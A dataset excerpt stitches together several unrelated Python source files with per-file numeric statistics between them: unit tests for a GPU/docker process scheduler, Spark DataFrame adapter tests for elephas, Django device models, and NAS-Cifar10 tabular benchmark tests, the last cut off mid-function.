    proc2 = scheduler.add_process_to_staging(
        {"cpus": 1, "gpus": 1, "memory": "10g"}, cur_time_in_s=0
    )
    self.assertEqual(98, len(scheduler.FREE_IDS))
    self.assertEqual(2, len(scheduler.USED_IDS))
    # Both processes sit in staging before the step runs.
    self.assertEqual(2, len(scheduler.STAGING_QUEUE))
    self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
    for proc in scheduler.STAGING_QUEUE:
        self.assertEqual(SCHED.Place.STAGING, proc.place)
    # One scheduling step: both fit and each gets a running mark file.
    scheduler.scheduling_step(running_docker_containers=[], current_time_in_s=0)
    self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
    FAKE_DOCKER[proc1.container_name()] = "running"  # simulate docker start
    self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
    FAKE_DOCKER[proc2.container_name()] = "running"
    self.assertEqual(0, len(scheduler.STAGING_QUEUE))
    self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
    for proc, gpus in scheduler.RUNNING_QUEUE:
        self.assertEqual(SCHED.Place.RUNNING, proc.place)
def test_scheduling_client_fails_to_run(self):
    """A scheduled process whose container never starts ("crashes") must be
    detected in the next scheduling step and removed from the running queue."""
    FAKE_DOCKER = {}  # container_name -> state; stands in for the docker daemon
    def fun_docker_kill(uid):
        assert uid in FAKE_DOCKER
        del FAKE_DOCKER[uid]
    mon = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
    scheduler = SCHEDULER.Scheduler(
        mon, fun_docker_kill=fun_docker_kill, max_id=100
    )
    self.assertEqual(100, len(scheduler.FREE_IDS))
    self.assertEqual(0, len(scheduler.USED_IDS))
    proc1 = scheduler.add_process_to_staging(
        {"cpus": 1, "gpus": 1, "memory": "10g"}
    )
    self.assertEqual(99, len(scheduler.FREE_IDS))
    self.assertEqual(1, len(scheduler.USED_IDS))
    proc2 = scheduler.add_process_to_staging(
        {"cpus": 1, "gpus": 1, "memory": "10g"}
    )
    # Both processes start out marked as staging on disk.
    self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
    self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
    self.assertEqual(98, len(scheduler.FREE_IDS))
    self.assertEqual(2, len(scheduler.USED_IDS))
    self.assertEqual(2, len(scheduler.STAGING_QUEUE))
    self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
    for proc in scheduler.STAGING_QUEUE:
        self.assertEqual(SCHED.Place.STAGING, proc.place)
    # -- step 1 --
    scheduler.scheduling_step(running_docker_containers=[], current_time_in_s=0)
    self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
    self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
    self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
    # proc1 does "crash" and is not scheduled!
    # This has to be picked-up in the next scheduling step!
    self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
    FAKE_DOCKER[proc2.container_name()] = "running"  # only proc2 actually starts
    self.assertEqual(0, len(scheduler.STAGING_QUEUE))
    self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
    # -- step 2 --
    # The scheduler reconciles against the real container list and drops proc1.
    cnt = list(FAKE_DOCKER.keys())
    scheduler.scheduling_step(running_docker_containers=cnt, current_time_in_s=60)
    for proc, gpus in scheduler.RUNNING_QUEUE:
        self.assertEqual(SCHED.Place.RUNNING, proc.place)
    self.assertEqual(0, len(scheduler.STAGING_QUEUE))
    self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
    self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
    self.assertFalse(isfile(SCHEDULER.get_mark_file(proc1.uid)))
    # -- step 3 --
    # Killing proc2 empties every queue.
    scheduler.schedule_uid_for_killing(proc2.uid)
    cnt = list(FAKE_DOCKER.keys())
    scheduler.scheduling_step(running_docker_containers=cnt, current_time_in_s=120)
    self.assertEqual(0, len(scheduler.STAGING_QUEUE))
    self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
    self.assertEqual(0, len(scheduler.KILLING_QUEUE))
def test_full_scheduling_cycle(self):
FAKE_DOCKER = {}
def fun_docker_kill(uid):
assert uid in FAKE_DOCKER, f"{uid} not in: " + str(FAKE_DOCKER.keys())
del FAKE_DOCKER[uid]
mon = ResourceMonitor(cpu_count=20, gpu_count=3, mem_gb=100)
scheduler = SCHEDULER.Scheduler(
mon, fun_docker_kill=fun_docker_kill, max_id=100
)
self.assertEqual(100, len(scheduler.FREE_IDS))
self.assertEqual(0, len(scheduler.USED_IDS))
# -- add proc1 --
proc1 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 2, "memory": "10g"}, cur_time_in_s=0
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
# = = = = = = = = = = = = = = = = =
# S T E P 1
# = = = = = = = = = = = = = = = = =
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=10)
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
# -- check proc1 --
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
FAKE_DOCKER[proc1.container_name()] = "RUNNING"
# -- add proc2 & proc3 --
proc2 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 2, "memory": "10g"}, cur_time_in_s=20
)
proc3 = scheduler.add_process_to_staging(
{
"cpus": 5,
"gpus": 1,
"memory": "10g",
"minimum_required_running_hours": 2,
},
cur_time_in_s=30,
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
# = = = = = = = = = = = = = = = = =
# S T E P 2
# = = = = = = = = = = = = = = = = =
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=60)
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
# -- check proc1 & proc2 & pro3 --
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc2.uid)))
FAKE_DOCKER[proc3.container_name()] = "RUNNING"
# -- add proc4 & proc5 --
proc4 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=70
)
proc5 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=80
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
# current status:
# RUNNING: [p1, p3]
# STAGING: [p2, p4, p5]
# = = = = = = = = = = = = = = = = =
# S T E P 3
# = = = = = = = = = = = = = = = = =
# do nothing...
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=160)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc5.uid)))
# = = = = = = = = = = = = = = = = =
# S T E P 4
# = = = = = = = = = = = = = = = = =
# more than 1h has passed: lets re-schedule!
# * p1 has to be killed and re-scheduled
# * p3 has to remain as it is not expired yet
# * p2 has to be scheduled!
scheduler.scheduling_step(
list(FAKE_DOCKER.keys()), current_time_in_s=160 + 60 * 60
)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
FAKE_DOCKER[proc2.container_name()] = "Running"
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc5.uid)))
# current status:
# RUNNING: [p3, p2(2x)]
# STAGING: [p4, p5, p1(2x)]
# = = = = = = = = = = = = = = = = =
# S T E P 5
# = = = = = = = = = = = = = = = = =
# more than 3h has passed: lets re-schedule!
# * kill p2
# * schedule p4, p5, keep p3
scheduler.scheduling_step(
list(FAKE_DOCKER.keys()), current_time_in_s=160 + 60 * 60 * 3
)
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_running(proc3) # is already running
self.assert_is_running(proc4)
FAKE_DOCKER[proc4.container_name()] = "RUNNING"
self.assert_is_running(proc5)
FAKE_DOCKER[proc5.container_name()] = "RUNNING"
# = = = = = = = = = = = = = = = = =
# S T E P 6 (do nothing)
# = = = = = = = = = = = = = = = = =
CUR_TIME = 300 + 60 * 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
# = = = = = = = = = = = = = = = = =
# S T E P 7 (schedule a new process)
# = = = = = = = = = = = = = = = = =
# current status:
# RUNNING: [p3, p4, p5]
# STAGING: [p1(2x), p2(2x)]
CUR_TIME += 150
proc6 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc6)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
# proc3 has to be killed as we can now fit a new process onto the system
# schedule proc6
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
self.assert_is_running(proc6)
FAKE_DOCKER[proc6.container_name()] = "RUNNING"
# current status:
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
# = = = = = = = = = = = = = = = = =
# S T E P 8 (do nothing)
# = = = = = = = = = = = = = = = = =
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
CUR_TIME += 50
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
self.assert_is_staging(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc5)
self.assert_is_running(proc6)
# = = = = = = = = = = = = = = = = =
# S T E P 9 (kill p5 & p2)
# = = = = = = = = = = = = = = = = =
# RUNNING: [p4, p5, p6]
# STAGING: [p1(2x), p2(2x), p3]
scheduler.schedule_uid_for_killing(proc5.uid)
scheduler.schedule_uid_for_killing(proc2.uid)
self.assertEqual(2, len(scheduler.KILLING_QUEUE))
CUR_TIME += 50
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_gone(proc2)
self.assert_is_running(proc3)
FAKE_DOCKER[proc3.container_name()] = "RUNNING"
self.assert_is_running(proc4)
self.assert_is_gone(proc5)
self.assert_is_running(proc6)
# current status
# RUNNING: [p4, p3, p6]
# STAGING: [p1(2x)]
CUR_TIME += 60 * 56 # barely exceed the limit for one!
# no re-scheduling is possible yet!
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc6)
# = = = = = = = = = = = = = = = = =
# S T E P 10 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assert_is_running(proc1)
FAKE_DOCKER[proc1.container_name()] = "RUNNING"
self.assert_is_running(proc3)
self.assert_is_staging(proc4)
self.assert_is_staging(proc6)
# RUNNING: [p3, p1(2x)]
# STAGING: [p4, p6]
# = = = = = = = = = = = = = = = = =
# S T E P 11 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 3
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
# for proc, _ in scheduler.RUNNING_QUEUE:
# print(proc.running_time_in_h(CUR_TIME), proc.may_be_killed(CUR_TIME))
self.assert_is_running(proc1)
self.assert_is_running(proc3)
self.assert_is_staging(proc4)
self.assert_is_staging(proc6)
# RUNNING: [p3, p1(2x)]
# STAGING: [p4, p6]
# = = = = = = = = = = = = = = = = =
# S T E P 11 (reshedule some)
# = = = = = = = = = = = = = = = = =
CUR_TIME += 60 * 1 * 60
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
# RUNNING: [p3, p4, p6]
# STAGING: [p1(2x)]
self.assert_is_staging(proc1)
self.assert_is_running(proc3)
self.assert_is_running(proc4)
self.assert_is_running(proc6)
FAKE_DOCKER[proc4.container_name()] = "RUNNING"
FAKE_DOCKER[proc6.container_name()] = "RUNNING"
# current status:
# RUNNING: [p3, p4, p6]
# STAGING: [p1(2x)]
# = = = = = = = = = = = = = = = = =
# S T E P 12 (reshedule some)
# = = = = = = = = = = = = = = = = =
# request to kill p6 & p1
# p4 & p6 kill themselves before!
# add p7(3x) and p8
del FAKE_DOCKER[proc4.container_name()]
del FAKE_DOCKER[proc6.container_name()]
CUR_TIME += 60
scheduler.schedule_uid_for_killing(proc6.uid)
scheduler.schedule_uid_for_killing(proc1.uid)
proc7 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 3, "memory": "10g"}, cur_time_in_s=CUR_TIME - 10
)
proc8 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(2, len(scheduler.KILLING_QUEUE))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
self.assert_is_gone(proc1)
self.assert_is_staging(proc3)
self.assert_is_gone(proc4)
self.assert_is_gone(proc6)
self.assert_is_running(proc7)
self.assert_is_staging(proc8)
# = = = = = = = = = = = = = = = = =
# S T E P 13 (reshedule some)
# = = = = = = = = = = = = = = = = =
# add proc9 without GPU req
CUR_TIME += 10
proc9 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 0, "memory": "1g"}, cur_time_in_s=CUR_TIME
)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
CUR_TIME += 5
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=CUR_TIME)
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc3)
self.assert_is_running(proc7)
self.assert_is_staging(proc8)
self.assert_is_running(proc9)
# print_running_queue(scheduler, CUR_TIME)
self.assertEqual(96, len(scheduler.FREE_IDS))
self.assertEqual(4, len(scheduler.USED_IDS))
def print_running_queue(scheduler, CUR_TIME):
    """Debug dump of the running queue: uid, killability, runtime (h), GPU set."""
    for entry, gpu_ids in scheduler.RUNNING_QUEUE:
        killable = entry.may_be_killed(CUR_TIME)
        hours = entry.running_time_in_h(CUR_TIME)
        print(f"{entry.uid} -> {killable} ({hours}), {gpu_ids}")
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
| 40.514599
| 104
| 0.618503
| 2,720
| 22,202
| 4.792647
| 0.070956
| 0.097806
| 0.055232
| 0.082694
| 0.890304
| 0.865603
| 0.836376
| 0.802777
| 0.788816
| 0.774778
| 0
| 0.031064
| 0.250383
| 22,202
| 547
| 105
| 40.588665
| 0.752208
| 0.124133
| 0
| 0.720222
| 0
| 0.00277
| 0.025691
| 0.005014
| 0
| 0
| 0
| 0
| 0.556787
| 1
| 0.033241
| false
| 0
| 0.01385
| 0
| 0.049862
| 0.00554
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89272f57191c95d096a46b200ec10c9c47493122
| 1,629
|
py
|
Python
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 1,674
|
2015-08-17T03:54:10.000Z
|
2022-03-29T12:07:43.000Z
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 183
|
2015-08-25T11:34:21.000Z
|
2022-03-22T15:33:59.000Z
|
tests/ml/test_adapter.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 359
|
2015-08-21T20:37:48.000Z
|
2022-03-23T15:41:12.000Z
|
import numpy as np
from elephas.ml import adapter
def test_to_data_frame(spark_context):
    """Two samples with plain regression labels become a 2-row DataFrame."""
    x = np.ones((2, 10))
    y = np.asarray([[2.0], [1.0]])
    df = adapter.to_data_frame(spark_context, x, y, categorical=False)
    assert df.count() == 2
def test_to_data_frame_cat(spark_context):
    """Two samples with one-hot labels become a 2-row DataFrame."""
    x = np.ones((2, 10))
    y = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
    df = adapter.to_data_frame(spark_context, x, y, categorical=True)
    assert df.count() == 2
def test_from_data_frame(spark_context):
    """Round-trip through a DataFrame preserves array shapes (regression labels)."""
    x = np.ones((2, 10))
    y = np.asarray([[2.0], [1.0]]).reshape((2,))
    df = adapter.to_data_frame(spark_context, x, y, categorical=False)
    x_back, y_back = adapter.from_data_frame(df, categorical=False)
    assert x.shape == x_back.shape
    assert y.shape == y_back.shape
def test_from_data_frame_cat(spark_context):
    """Round-trip through a DataFrame preserves array shapes (one-hot labels)."""
    x = np.ones((2, 10))
    y = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
    df = adapter.to_data_frame(spark_context, x, y, categorical=True)
    x_back, y_back = adapter.from_data_frame(df, categorical=True, nb_classes=3)
    assert x.shape == x_back.shape
    assert y.shape == y_back.shape
def test_df_to_simple_rdd(spark_context):
    """Converting a DataFrame into a simple RDD keeps one element per row."""
    x = np.ones((2, 10))
    y = np.asarray([[2.0], [1.0]]).reshape((2,))
    df = adapter.to_data_frame(spark_context, x, y, categorical=False)
    rdd = adapter.df_to_simple_rdd(df, False)
    assert rdd.count() == 2
| 29.089286
| 78
| 0.674647
| 245
| 1,629
| 4.257143
| 0.159184
| 0.181208
| 0.191755
| 0.14094
| 0.880153
| 0.863854
| 0.861937
| 0.808245
| 0.808245
| 0.727709
| 0
| 0.036925
| 0.18539
| 1,629
| 55
| 79
| 29.618182
| 0.749058
| 0
| 0
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 1
| 0.135135
| false
| 0
| 0.054054
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
893dbdea6110e4e6062451bbec8f8912b9de549a
| 2,349
|
py
|
Python
|
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | null | null | null |
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | 3
|
2021-03-19T11:05:51.000Z
|
2021-06-09T19:25:54.000Z
|
inventory/models.py
|
shreysway/Dubai-Hospital
|
0333028f11e65430ff45ca17db4545d2d648c0be
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Device(models.Model):
    """Abstract base for a trackable hospital device (desktop/laptop/mobile)."""

    # Free-text status of the device; required (blank=False).
    Status = models.CharField(max_length=200, blank=False)
    # Doctor the device is associated with.
    DoctorName = models.CharField(max_length=200)
    # Identification token for the device.
    TokenNo = models.CharField(max_length=50)
    # Short description of any reported issues.
    issues = models.CharField(max_length=50)

    class Meta:
        # No table for Device itself; each concrete subclass gets its own table.
        abstract = True

    def __str__(self):
        return 'Status: {0} TokenNo: {1}'.format(self.Status, self.TokenNo)
# Concrete device model: gets its own table with all of Device's fields.
class Desktops(Device):
    pass
# Concrete device model: gets its own table with all of Device's fields.
class Laptops(Device):
    pass
# Concrete device model: gets its own table with all of Device's fields.
class Mobiles(Device):
    pass
# class Desktops(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
#
#
# class Laptops(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
#
#
# class Mobiles(models.Model):
# status = models.CharField(max_length=200, blank=False)
# doctorname = models.IntegerField()
#
# roomno = (
# ('SOLD', 'Item already purchased'),
# ('AVAILABLE', 'Item ready to be purchased'),
# ('RESTOCKING', 'Item restocking in few days')
# )
#
# status = models.CharField(max_length=10, roomno=roomno, default='SOLD')
# issues = models.CharField(max_length=50, default="No Issues")
#
# def __str__(self):
# return 'status: {0} doctorname: {1}'.format(self.status, self.doctorname)
| 30.115385
| 84
| 0.616858
| 260
| 2,349
| 5.461538
| 0.203846
| 0.137324
| 0.164789
| 0.219718
| 0.865493
| 0.817606
| 0.778873
| 0.778873
| 0.778873
| 0.778873
| 0
| 0.0218
| 0.238399
| 2,349
| 77
| 85
| 30.506494
| 0.77194
| 0.707961
| 0
| 0.1875
| 0
| 0
| 0.043011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.1875
| 0.0625
| 0.0625
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
8964100923a118137f3c58844605188df91fa8f4
| 3,984
|
py
|
Python
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 76
|
2019-02-13T00:47:50.000Z
|
2022-02-09T00:02:23.000Z
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 10
|
2019-01-30T14:18:37.000Z
|
2021-11-20T01:29:38.000Z
|
test/test_tabular_benchmarks/test_tabular_nas_cifar10.py
|
haconline/nas_benchmarks
|
1b09906ba3f522f15766b75643423acccd9db3a5
|
[
"BSD-3-Clause"
] | 29
|
2018-03-14T22:27:30.000Z
|
2022-03-06T23:01:48.000Z
|
import unittest
from tabular_benchmarks import NASCifar10A, NASCifar10B, NASCifar10C
class TestNASCifar10A(unittest.TestCase):
    """Tests for the NASCifar10A tabular benchmark."""

    def setUp(self):
        self.b = NASCifar10A(data_dir="./")

    def test_fix_configuration(self):
        """Evaluate a hand-picked inception-style cell and check its tabulated accuracy."""
        space = self.b.get_configuration_space()
        config = space.sample_configuration()
        # Operations on the five intermediate nodes of the cell.
        node_ops = ('conv1x1-bn-relu', 'conv3x3-bn-relu', 'conv3x3-bn-relu',
                    'conv3x3-bn-relu', 'maxpool3x3')
        for node, op in enumerate(node_ops):
            config["op_node_%d" % node] = op
        # Turn on exactly these edges; all other edge slots stay 0.
        active_edges = {0, 1, 2, 4, 10, 14, 15, 19, 20}
        for i in range(21):
            config["edge_%d" % i] = 1 if i in active_edges else 0
        y, cost = self.b.objective_function(config, 108)
        regret = self.b.get_results()['regret_test'][0]
        mean_test_acc = 1 - (self.b.y_star_test + regret)
        assert mean_test_acc == 0.9308560291926066

    def test_random_sampling(self):
        """A randomly drawn configuration must be evaluable without error."""
        config = self.b.get_configuration_space().sample_configuration()
        self.b.objective_function(config)
class TestNASCifar10B(unittest.TestCase):
    """Tests for the NASCifar10B tabular benchmark."""

    def setUp(self):
        self.b = NASCifar10B(data_dir="./")

    def test_fix_configuration(self):
        """Evaluate the fixed inception-style cell and check its tabulated accuracy."""
        space = self.b.get_configuration_space()
        config = space.sample_configuration()
        node_ops = ('conv1x1-bn-relu', 'conv3x3-bn-relu', 'conv3x3-bn-relu',
                    'conv3x3-bn-relu', 'maxpool3x3')
        for node, op in enumerate(node_ops):
            config["op_node_%d" % node] = op
        # Edge-slot values for this benchmark's encoding (taken from the original test).
        for slot, value in enumerate((0, 1, 2, 4, 10, 14, 15, 19, 20)):
            config["edge_%d" % slot] = value
        y, cost = self.b.objective_function(config, 108)
        regret = self.b.get_results()['regret_test'][0]
        mean_test_acc = 1 - (self.b.y_star_test + regret)
        assert mean_test_acc == 0.9308560291926066

    def test_random_sampling(self):
        """A randomly drawn configuration must be evaluable without error."""
        config = self.b.get_configuration_space().sample_configuration()
        self.b.objective_function(config)
class TestNASCifar10C(unittest.TestCase):
    """Tests for the NASCifar10C tabular benchmark."""

    def setUp(self):
        self.b = NASCifar10C(data_dir="./")

    def test_fix_configuration(self):
        """Evaluate the fixed inception-style cell and check its tabulated accuracy."""
        from tabular_benchmarks.nas_cifar10 import VERTICES

